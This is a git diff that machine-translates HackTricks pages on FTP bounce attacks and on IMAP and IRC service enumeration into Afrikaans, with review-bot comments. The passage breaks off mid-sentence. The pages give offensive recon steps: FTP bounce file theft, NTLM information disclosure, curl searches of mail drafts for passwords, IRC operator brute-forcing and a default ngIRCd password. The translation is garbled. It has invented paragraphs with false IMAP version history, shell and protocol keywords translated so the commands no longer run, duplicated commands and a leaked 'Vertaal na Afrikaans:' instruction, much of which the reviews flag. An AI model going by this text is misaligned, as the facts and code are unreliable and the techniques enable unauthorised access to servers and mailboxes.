-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
-# Resume +# Hervat -If you have access to a bounce FTP server, you can make it request files of other FTP server \(where you know some credentials\) and download that file to your own server. +As jy toegang het tot 'n stuiterende FTP-bediener, kan jy dit laat versoek om lêers van 'n ander FTP-bediener (waarvan jy sekere geloofsbriewe ken) te vra en daardie lêer na jou eie bediener te laai. -## Requirements +## Vereistes -- FTP valid credentials in the FTP Middle server -- FTP valid credentials in Victim FTP server -- Both server accepts the PORT command \(bounce FTP attack\) -- You can write inside some directory of the FRP Middle server -- The middle server will have more access inside the Victim FTP Server than you for some reason \(this is what you are going to exploit\) +- Geldige FTP-geloofsbriewe in die FTP Middelbediener +- Geldige FTP-geloofsbriewe in die slagoffer FTP-bediener +- Beide bedieners aanvaar die PORT-opdrag (stuiterende FTP-aanval) +- Jy kan binne 'n gids van die FRP Middelbediener skryf +- Die middelbediener sal meer toegang tot die slagoffer FTP-bediener hê as jy om een of ander rede (dit is wat jy gaan uitbuit) -## Steps +## Stappe -1. Connect to your own FTP server and make the connection passive \(pasv command\) to make it listen in a directory where the victim service will send the file -2. Make the file that is going to send the FTP Middle server t the Victim server \(the exploit\). This file will be a plaint text of the needed commands to authenticate against the Victim server, change the directory and download a file to your own server. -3. Connect to the FTP Middle Server and upload de previous file -4. Make the FTP Middle server establish a connection with the victim server and send the exploit file -5. Capture the file in your own FTP server -6. Delete the exploit file from the FTP Middle server +1. 
Maak verbinding met jou eie FTP-bediener en maak die verbinding passief (pasv-opdrag) sodat dit in 'n gids luister waar die slagofferdiens die lêer sal stuur +2. Maak die lêer wat die FTP Middelbediener na die Slagofferbediener gaan stuur (die uitbuiting). Hierdie lêer sal 'n eenvoudige teks wees van die nodige opdragte om teen die Slagofferbediener te verifieer, die gids te verander en 'n lêer na jou eie bediener te laai. +3. Maak verbinding met die FTP Middelbediener en laai die vorige lêer op +4. Laat die FTP Middelbediener 'n verbinding met die slagofferbediener tot stand bring en stuur die uitbuitingslêer +5. Vang die lêer op jou eie FTP-bediener +6. Verwyder die uitbuitingslêer van die FTP Middelbediener -For a more detailed information check the post: [http://www.ouah.org/ftpbounce.html](http://www.ouah.org/ftpbounce.html) +Vir meer gedetailleerde inligting, kyk na die pos: [http://www.ouah.org/ftpbounce.html](http://www.ouah.org/ftpbounce.html)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
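Review bot: The heading `# Resume` in ftp-bounce-download-2oftp-file.md is used in the sense of "summary", so `# Hervat` (to continue) is the wrong word; `# Samevatting` or `# Opsomming` is what is meant. The translation also carries the source typo `FRP Middle server` over as `FRP Middelbediener`; this is the FTP middle server and should read `FTP Middelbediener` like the surrounding bullets. Consider keeping "bounce FTP" as the established term instead of the literal "stuiterende FTP-bediener".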
- - diff --git a/network-services-pentesting/pentesting-imap.md b/network-services-pentesting/pentesting-imap.md index 9f0ac5983..a6f0d106c 100644 --- a/network-services-pentesting/pentesting-imap.md +++ b/network-services-pentesting/pentesting-imap.md @@ -2,21 +2,21 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. +Vind kwesbaarhede wat die belangrikste is sodat jy hulle vinniger kan regstel. Intruder volg jou aanvalsoppervlak, voer proaktiewe dreigingsskanderings uit, vind probleme regoor jou hele tegnologie-stapel, van API's tot webtoepassings en wolkstelsels. [**Probeer dit vandag nog gratis**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks). {% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} 
@@ -24,114 +24,133 @@ Find vulnerabilities that matter most so you can fix them faster. Intruder track ## Internet Message Access Protocol -The **Internet Message Access Protocol (IMAP)** is designed for the purpose of enabling users to **access their email messages from any location**, primarily through an Internet connection. In essence, emails are **retained on a server** rather than being downloaded and stored on an individual's personal device. This means that when an email is accessed or read, it is done **directly from the server**. This capability allows for the convenience of checking emails from **multiple devices**, ensuring that no messages are missed regardless of the device used. +Die **Internet Message Access Protocol (IMAP)** is ontwerp om gebruikers in staat te stel om hul e-posse van enige plek af te **toegang**, hoofsaaklik deur middel van 'n internetverbinding. In essensie word e-posse **op 'n bediener behou** in plaas daarvan om afgelaai en gestoor te word op 'n individu se persoonlike toestel. Dit beteken dat wanneer 'n e-pos geopen of gelees word, dit **direk vanaf die bediener** gedoen word. Hierdie vermoë maak dit gerieflik om e-posse vanaf **verskeie toestelle** te kontroleer, om te verseker dat geen boodskappe gemis word nie, ongeag die gebruikte toestel. -By default, the IMAP protocol works on two ports: - -* **Port 143** - this is the default IMAP non-encrypted port -* **Port 993** - this is the port you need to use if you want to connect using IMAP securely +Standaard werk die IMAP-protokol op twee poorte: +* **Poort 143** - dit is die verstek IMAP nie-gekripteerde poort +* **Poort 993** - dit is die poort wat jy moet gebruik as jy veilig wil koppel met IMAP ``` PORT STATE SERVICE REASON 143/tcp open imap syn-ack ``` +## Banner gryp -## Banner grabbing +Banner gryp is 'n tegniek wat gebruik word om inligting oor 'n IMAP-diens te verkry deur die banner te ondersoek wat deur die diens tydens die verbinding verskaf word. 
Die banner is 'n stuk teks wat deur die diens teruggestuur word as deel van die verwelkomingsboodskap wanneer 'n kliënt suksesvol met die diens verbind. +Hier is 'n voorbeeld van 'n IMAP-banner: + +``` +* OK [CAPABILITY IMAP4rev1 STARTTLS AUTH=PLAIN] IMAP4rev1 Service Ready +``` + +Die banner kan waardevolle inligting verskaf, soos die diens se naam, weergawe, ondersteunde funksies en selfs sekuriteitskwessies. Dit kan 'n nuttige beginpunt wees vir 'n aanvaller om die diens te ondersoek en potensiële aanvalsveilighede te identifiseer. + +Om 'n banner gryp uit te voer, kan jy 'n netwerk-skanderingstool soos Nmap gebruik. Hier is 'n voorbeeld van die gebruik van Nmap om 'n IMAP-diens se banner te gryp: + +``` +nmap -p 143 --script imap-capabilities +``` + +Dit sal die banner van die IMAP-diens op die gespesifiseerde teiken skandeer en die ondersteunde funksies en protokolversie toon. + +Dit is belangrik om banner gryp met omsigtigheid uit te voer, aangesien dit 'n potensiële aanvaller kan blootstel aan die diens en die risiko van opsporing kan verhoog. Dit moet slegs in 'n geoorloofde omgewing en met toestemming van die eienaar van die stelsel uitgevoer word. ```bash nc -nv 143 openssl s_client -connect :993 -quiet ``` +### NTLM-verifikasie - Inligtingsoffergawe -### NTLM Auth - Information disclosure - -If the server supports NTLM auth (Windows) you can obtain sensitive info (versions): - +As die bediener NTLM-verifikasie ondersteun (Windows), kan jy sensitiewe inligting (weergawes) bekom: ``` -root@kali: telnet example.com 143 -* OK The Microsoft Exchange IMAP4 service is ready. ->> a1 AUTHENTICATE NTLM -+ ->> TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA= +root@kali: telnet example.com 143 +* OK The Microsoft Exchange IMAP4 service is ready. 
+>> a1 AUTHENTICATE NTLM ++ +>> TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA= + TlRMTVNTUAACAAAACgAKADgAAAAFgooCBqqVKFrKPCMAAAAAAAAAAEgASABCAAAABgOAJQAAAA9JAEkAUwAwADEAAgAKAEkASQBTADAAMQABAAoASQBJAFMAMAAxAAQACgBJAEkAUwAwADEAAwAKAEkASQBTADAAMQAHAAgAHwMI0VPy1QEAAAAA ``` - -Or **automate** this with **nmap** plugin `imap-ntlm-info.nse` +Of **outomatiseer** dit met die **nmap** invoegtoepassing `imap-ntlm-info.nse` ### [IMAP Bruteforce](../generic-methodologies-and-resources/brute-force.md#imap) -## Syntax +## Sintaksis -IAMP Commands examples from [here](https://donsutherland.org/crib/imap): - +IAMP-opdragvoorbeelde van [hier](https://donsutherland.org/crib/imap): ``` Login - A1 LOGIN username password +A1 LOGIN username password Values can be quoted to enclose spaces and special characters. A " must then be escape with a \ - A1 LOGIN "username" "password" +A1 LOGIN "username" "password" List Folders/Mailboxes - A1 LIST "" * - A1 LIST INBOX * - A1 LIST "Archive" * +A1 LIST "" * +A1 LIST INBOX * +A1 LIST "Archive" * Create new Folder/Mailbox - A1 CREATE INBOX.Archive.2012 - A1 CREATE "To Read" +A1 CREATE INBOX.Archive.2012 +A1 CREATE "To Read" Delete Folder/Mailbox - A1 DELETE INBOX.Archive.2012 - A1 DELETE "To Read" +A1 DELETE INBOX.Archive.2012 +A1 DELETE "To Read" Rename Folder/Mailbox - A1 RENAME "INBOX.One" "INBOX.Two" +A1 RENAME "INBOX.One" "INBOX.Two" List Subscribed Mailboxes - A1 LSUB "" * +A1 LSUB "" * Status of Mailbox (There are more flags than the ones listed) - A1 STATUS INBOX (MESSAGES UNSEEN RECENT) +A1 STATUS INBOX (MESSAGES UNSEEN RECENT) Select a mailbox - A1 SELECT INBOX +A1 SELECT INBOX List messages - A1 FETCH 1:* (FLAGS) - A1 UID FETCH 1:* (FLAGS) +A1 FETCH 1:* (FLAGS) +A1 UID FETCH 1:* (FLAGS) Retrieve Message Content - A1 FETCH 2 body[text] - A1 FETCH 2 all - A1 UID FETCH 102 (UID RFC822.SIZE BODY.PEEK[]) +A1 FETCH 2 body[text] +A1 FETCH 2 all +A1 UID FETCH 102 (UID RFC822.SIZE BODY.PEEK[]) Close Mailbox - A1 CLOSE +A1 CLOSE Logout - A1 LOGOUT 
+A1 LOGOUT ``` +### Evolusie -### Evolution +IMAP (Internet Message Access Protocol) is 'n protokol wat gebruik word om e-pos te ontvang en te stuur. Dit is 'n belangrike diens wat deur baie e-posbedieners en -kliënte gebruik word. Die protokol het deur die jare geëvolueer om te voldoen aan die veranderende behoeftes van gebruikers en om sekuriteitskwessies aan te spreek. +Die oorspronklike IMAP-protokol, bekend as IMAP4, is in 1986 ontwikkel. Dit het die funksionaliteit gebied om e-posboodskappe op 'n bediener te stoor en te bestuur. Dit het ook toegelaat dat gebruikers e-posboodskappe op die bediener laat staan terwyl hulle slegs 'n gedeelte van die boodskappe op hul toestelle aflaai. + +In 1993 is IMAP4 gereviseer en opgegradeer na IMAP4rev1. Hierdie opgradering het nuwe funksies en verbeterings gebring, soos die vermoë om e-posboodskappe in mappen te organiseer en om te gaan met gedeelde mappen. Dit het ook die gebruik van MIME (Multipurpose Internet Mail Extensions) ondersteun, wat die oordrag van nie-tekstuele inhoud soos bylae moontlik maak. + +Die mees onlangse weergawe van IMAP is IMAP4rev2, wat in 2003 vrygestel is. Hierdie weergawe het verdere verbeterings gebring, insluitend die vermoë om e-posboodskappe te soek en te filter, en die ondersteuning van SSL/TLS vir veilige kommunikasie. + +Die evolusie van IMAP het dit 'n kragtige en veelsydige protokol gemaak wat gebruikers in staat stel om e-posboodskappe effektief te bestuur en te organiseer. Dit is egter belangrik om bewus te wees van die sekuriteitskwessies wat met IMAP gepaard gaan en om toepaslike maatreëls te tref om die integriteit en vertroulikheid van e-pos te beskerm. 
``` apt install evolution ``` - ![](<../.gitbook/assets/image (528).png>) ### CURL -Basic navigation is possible with [CURL](https://ec.haxx.se/usingcurl/usingcurl-reademail#imap), but the documentation is light on details so checking the [source](https://github.com/curl/curl/blob/master/lib/imap.c) is recommended for precise details. - -1. Listing mailboxes (imap command `LIST "" "*"`) +Basiese navigasie is moontlik met [CURL](https://ec.haxx.se/usingcurl/usingcurl-reademail#imap), maar die dokumentasie is lig op besonderhede, so dit is aanbeveel om die [bron](https://github.com/curl/curl/blob/master/lib/imap.c) te raadpleeg vir presiese besonderhede. +1. Lys van posbusse (imap-opdrag `LIST "" "*"`) ```bash curl -k 'imaps://1.2.3.4/' --user user:pass ``` -2. Listing messages in a mailbox (imap command `SELECT INBOX` and then `SEARCH ALL`) +2. Lys van boodskappe in 'n posbus (imap-opdrag `SELECT INBOX` en dan `SEARCH ALL`) - ```bash +```bash curl -k 'imaps://1.2.3.4/INBOX?ALL' --user user:pass ``` @@ -140,7 +159,7 @@ The result of this search is a list of message indicies. Its also possible to provide more complex search terms. e.g. searching for drafts with password in mail body: ```bash -curl -k 'imaps://1.2.3.4/Drafts?TEXT password' --user user:pass +curl -k 'imaps://1.2.3.4/Drafts?TEKS wagwoord' --user gebruiker:wagwoord ``` A nice overview of the search terms possible is located [here](https://www.atmail.com/blog/imap-commands/). @@ -148,6 +167,10 @@ A nice overview of the search terms possible is located [here](https://www.atmai 3. Downloading a message (imap command `SELECT Drafts` and then `FETCH 1 BODY[]`) ```bash +curl -k 'imaps://1.2.3.4/Drafts;MAILINDEX=1' --user user:pass + +Vertaal na Afrikaans: + curl -k 'imaps://1.2.3.4/Drafts;MAILINDEX=1' --user user:pass ``` 
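Review bot: The `@@ -24,114 +24,133 @@` hunk in pentesting-imap.md adds text that is not in the English source and should be dropped from a translation-only change: the explanatory paragraphs under `## Banner gryp` (including the invented example banner, the `nmap -p 143 --script imap-capabilities` line with no target, and the closing paragraph about authorisation) and the five paragraphs of protocol history under `### Evolusie`. That section is about the Evolution mail client (`apt install evolution` directly follows it), not the evolution of the protocol, and the dates in the added history do not match the IMAP RFCs. Further: `Inligtingsoffergawe` is not a word for "information disclosure" (use `Inligtingsonthulling`); the indentation inside the NTLM telnet block and the IMAP syntax block was stripped, which changes code-block content for no reason; in the `@@ -140,7 +159,7 @@` hunk the IMAP SEARCH keyword `TEXT` was translated to `TEKS` and the placeholder to `gebruiker:wagwoord`, which breaks the command because `TEXT` is protocol syntax; and in the `@@ -148,6 +167,10 @@` hunk the curl line is duplicated with the stray instruction `Vertaal na Afrikaans:` inside the fence, which is leaked tooling output and must go.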
@@ -156,23 +179,33 @@ The mail index will be the same index returned from the search operation. It is also possible to use `UID` (unique id) to access messages, however it is less conveniant as the search command needs to be manually formatted. E.g. ```bash +```afrikaans curl -k 'imaps://1.2.3.4/INBOX' -X 'UID SEARCH ALL' --user user:pass curl -k 'imaps://1.2.3.4/INBOX;UID=1' --user user:pass ``` +```afrikaans +curl -k 'imaps://1.2.3.4/INBOX' -X 'UID SOEK ALLES' --user gebruiker:wagwoord +curl -k 'imaps://1.2.3.4/INBOX;UID=1' --user gebruiker:wagwoord +``` +``` Also, possible to download just parts of a message, e.g. subject and sender of first 5 messages (the `-v` is required to see the subject and sender): ```bash +$ curl -k 'imaps://1.2.3.4/INBOX' -X 'FETCH 1:5 BODY[HEADER.FIELDS (SUBJECT FROM)]' --user user:pass -v 2>&1 | grep '^<' + +Vertaal na Afrikaans: + $ curl -k 'imaps://1.2.3.4/INBOX' -X 'FETCH 1:5 BODY[HEADER.FIELDS (SUBJECT FROM)]' --user user:pass -v 2>&1 | grep '^<' ``` Although, its probably cleaner to just write a little for loop: ```bash -for m in {1..5}; do - echo $m - curl "imap://1.2.3.4/INBOX;MAILINDEX=$m;SECTION=HEADER.FIELDS%20(SUBJECT%20FROM)" --user user:pass -done +Vir m in {1..5}; doen +echo $m +curl "imap://1.2.3.4/INBOX;MAILINDEX=$m;SECTION=HEADER.FIELDS%20(SUBJECT%20FROM)" --user user:pass +gedaan ``` ## Shodan 
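Review bot: In the `@@ -156,23 +179,33 @@` hunk the shell loop has its keywords translated (`Vir m in {1..5}; doen` and `gedaan`), so the script no longer runs; `for`, `do` and `done` are Bash syntax and must stay exactly as in the original, ideally with the original indentation. The UID example is also broken: an ```afrikaans fence is opened inside the existing ```bash block, a second copy with `UID SOEK ALLES` and `gebruiker:wagwoord` follows, and a stray closing fence is left behind, leaving the fences unbalanced and translating the IMAP keywords `SEARCH ALL`, which are protocol syntax. The FETCH example is likewise duplicated with the leaked instruction `Vertaal na Afrikaans:` between the copies; keep a single untouched copy of each command.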
@@ -183,33 +216,33 @@ done ## HackTricks Automatic Commands ``` -Protocol_Name: IMAP #Protocol Abbreviation if there is one. -Port_Number: 143,993 #Comma separated if there is more than one. -Protocol_Description: Internet Message Access Protocol #Protocol Abbreviation Spelled out +Protokol_Naam: IMAP #Protokol Afkorting indien daar een is. +Poort_Nommer: 143,993 #Komma geskei indien daar meer as een is. +Protokol_Beskrywing: Internet Message Access Protocol #Protokol Afkorting voluit geskryf -Entry_1: - Name: Notes - Description: Notes for WHOIS - Note: | - The Internet Message Access Protocol (IMAP) is designed for the purpose of enabling users to access their email messages from any location, primarily through an Internet connection. In essence, emails are retained on a server rather than being downloaded and stored on an individual's personal device. This means that when an email is accessed or read, it is done directly from the server. This capability allows for the convenience of checking emails from multiple devices, ensuring that no messages are missed regardless of the device used. +Inskrywing_1: +Naam: Notas +Beskrywing: Notas vir WHOIS +Nota: | +Die Internet Message Access Protocol (IMAP) is ontwerp om gebruikers in staat te stel om hul e-pos boodskappe van enige plek te benader, hoofsaaklik deur middel van 'n internetverbinding. In wese word e-posse op 'n bediener behou in plaas daarvan om afgelaai en gestoor te word op 'n individu se persoonlike toestel. Dit beteken dat wanneer 'n e-pos geopen of gelees word, dit direk vanaf die bediener gedoen word. Hierdie vermoë maak dit gerieflik om e-posse vanaf verskeie toestelle te kontroleer, om te verseker dat geen boodskappe gemis word nie, ongeag die gebruikte toestel. 
- https://book.hacktricks.xyz/pentesting/pentesting-imap +https://book.hacktricks.xyz/pentesting/pentesting-imap -Entry_2: - Name: Banner Grab - Description: Banner Grab 143 - Command: nc -nv {IP} 143 +Inskrywing_2: +Naam: Banner Grys +Beskrywing: Banner Grys 143 +Opdrag: nc -nv {IP} 143 -Entry_3: - Name: Secure Banner Grab - Description: Banner Grab 993 - Command: openssl s_client -connect {IP}:993 -quiet - -Entry_4: - Name: consolesless mfs enumeration - Description: IMAP enumeration without the need to run msfconsole - Note: sourced from https://github.com/carlospolop/legion - Command: msfconsole -q -x 'use auxiliary/scanner/imap/imap_version; set RHOSTS {IP}; set RPORT 143; run; exit' +Inskrywing_3: +Naam: Veilige Banner Grys +Beskrywing: Banner Grys 993 +Opdrag: openssl s_client -connect {IP}:993 -quiet + +Inskrywing_4: +Naam: mfs opsporing sonder die nodigheid om msfconsole te hardloop +Beskrywing: IMAP opsporing sonder die nodigheid om msfconsole te hardloop +Nota: afkomstig van https://github.com/carlospolop/legion +Opdrag: msfconsole -q -x 'use auxiliary/scanner/imap/imap_version; set RHOSTS {IP}; set RPORT 143; run; exit' ```
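Review bot: The `## HackTricks Automatic Commands` block in the `@@ -183,33 +216,33 @@` hunk is a machine-readable record (its own note says it is sourced from the legion project), so renaming the keys (`Protocol_Name` to `Protokol_Naam`, `Entry_1` to `Inskrywing_1`, `Name`/`Description`/`Command` to `Naam`/`Beskrywing`/`Opdrag`) and stripping the indentation under each entry will break whatever parses it; restore the English keys and the original two-space indentation and translate at most the free-text `Note:` value. Also `Banner Grab` was rendered as `Banner Grys` (grey), and the `Name:` of `Entry_4` was replaced by its description text instead of translating `consolesless mfs enumeration`.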
diff --git a/network-services-pentesting/pentesting-irc.md b/network-services-pentesting/pentesting-irc.md index 908b46b4b..23f028413 100644 --- a/network-services-pentesting/pentesting-irc.md +++ b/network-services-pentesting/pentesting-irc.md @@ -2,48 +2,43 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## Basic Information +## Basiese Inligting -IRC, initially a **plain text protocol**, was assigned **194/TCP** by IANA but is commonly run on **6667/TCP** and similar ports to avoid needing **root privileges** for operation. +IRC, aanvanklik 'n **plain text-protokol**, is toegewys aan **194/TCP** deur IANA, maar word gewoonlik uitgevoer op **6667/TCP** en soortgelyke poorte om te voorkom dat **root-voorregte** nodig is vir bedryf. -A **nickname** is all that's needed to connect to a server. Following connection, the server performs a reverse-DNS lookup on the user's IP. +'n **Bynaam** is alles wat nodig is om met 'n bediener te verbind. Na die verbinding voer die bediener 'n omgekeerde DNS-opsoek uit op die IP-adres van die gebruiker. -Users are divided into **operators**, who need a **username** and **password** for more access, and regular **users**. Operators have varying levels of privileges, with administrators at the top. - -**Default ports:** 194, 6667, 6660-7000 +Gebruikers word verdeel in **operateurs**, wat 'n **gebruikersnaam** en **wagwoord** nodig het vir meer toegang, en gewone **gebruikers**. Operateurs het verskillende vlakke van voorregte, met administrateurs bo-aan. +**Verstekpoorte:** 194, 6667, 6660-7000 ``` PORT STATE SERVICE 6667/tcp open irc ``` +## Opname -## Enumeration - -### Banner - -IRC can support **TLS**. +### Banier +IRC kan **TLS** ondersteun. ```bash nc -vn openssl s_client -connect : -quiet ``` +### Handleiding -### Manual - -Here you can see how to connect and access the IRC using some **random nickname** and then enumerate some interesting info. You can learn more commands of IRC [here](https://en.wikipedia.org/wiki/List\_of\_Internet\_Relay\_Chat\_commands#USERIP). - +Hier kan jy sien hoe om te verbind en toegang te verkry tot die IRC deur gebruik te maak van 'n **willekeurige bynaam** en dan sekere interessante inligting op te som. 
Jy kan meer bevele van IRC leer [hier](https://en.wikipedia.org/wiki/List\_of\_Internet\_Relay\_Chat\_commands#USERIP). ```bash #Connection with random nickname USER ran213eqdw123 0 * ran213eqdw123 
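Review bot: "+### Handleiding" mistranslates the heading "-### Manual", which in this page means manual enumeration (connecting by hand with a random nickname, as the paragraph below it explains) rather than a user guide; "### Handmatig" or "### Handmatige enumerasie" keeps the meaning, and "+## Opname" for "-## Enumeration" would read more naturally as "## Enumerasie". The hunk also strips the blank lines that separated prose and headings from the ``` fences (e.g. "+**Verstekpoorte:** 194, 6667, 6660-7000 ```" and "+## Opname" directly after a closing fence, where the removed "-" lines were blank); please keep the original blank lines so the Markdown layout matches the English source.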
@@ -72,37 +67,51 @@ JOIN #Connect to a channel #Operator creds Brute-Force OPER ``` - -You can, also, atttempt to login to the server with a password. The default password for ngIRCd is `wealllikedebian`. - +Jy kan ook probeer om in te teken op die bediener met 'n wagwoord. Die verstek wagwoord vir ngIRCd is `wealllikedebian`. ```bash PASS wealllikedebian NICK patrick USER test1 test2 :test3 ``` +### **Vind en skandeer IRC-dienste** -### **Find and scan IRC services** +IRC (Internet Relay Chat) is 'n kommunikasieprotokol wat gebruik word vir real-time gesprekke oor die internet. Dit is 'n gewilde platform vir gemeenskapsgebaseerde gesprekke en groepskommunikasie. As 'n pentester is dit belangrik om IRC-dienste te vind en te skandeer vir moontlike kwesbaarhede. +#### **1. Identifiseer IRC-dienste** + +Om IRC-dienste te vind, kan jy die volgende metodes gebruik: + +- **Portskandering**: Skandeer die doelwit se IP-adres vir oop poorte wat verband hou met IRC-dienste. Die standaardpoort vir IRC is 6667, maar dit kan ook op ander poorte bedryf word. +- **Banner Grabbing**: Maak gebruik van 'n gereedskap soos `telnet` om na die baniere van die doelwit se IP-adres te soek. IRC-dienste kan dikwels spesifieke baniere hê wat dit maklik maak om hulle te identifiseer. + +#### **2. Skandeer IRC-dienste** + +Nadat jy IRC-dienste geïdentifiseer het, kan jy dit skandeer vir moontlike kwesbaarhede. Hier is 'n paar tegnieke wat jy kan gebruik: + +- **Niksheid**: Probeer om toegang te verkry tot die IRC-diens sonder om opgemerk te word. Dit kan gedoen word deur die standaardgebruikersnaam en 